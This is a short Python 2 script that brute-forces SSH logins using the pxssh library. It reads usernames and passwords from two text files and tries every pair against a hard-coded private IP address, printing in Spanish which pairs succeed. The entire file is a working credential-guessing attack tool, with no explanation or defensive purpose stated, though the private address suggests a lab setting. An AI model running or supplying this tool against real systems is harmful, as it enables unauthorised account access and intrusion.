#!/usr/bin/python
# -*- conding: UTF-8 -*-
#DannyRojas
#@RojasKnight
#___________________
import pxssh
#-------------------

usuarios = open("usuarios.txt","r")

for usuario in usuarios.read().split("\n"):
	passwords = open("passwords.txt","r")
	for password in passwords.read().split("\n"):
		try:
			conectar = pxssh.pxssh()
			conectar.login("192.168.159.130",str(usuario),str(password))
			print "Usuario y Password Correctas"
			print "[+] Usuario: {}".format(usuario)
			print "[+] password: {}".format(password)
		except:
			print "[-] Usuarios y Passwords Incorrectas"
			print "[-] Usuario: {}".format(usuario)
			print "[-] Passowrd: {} ".format(password)
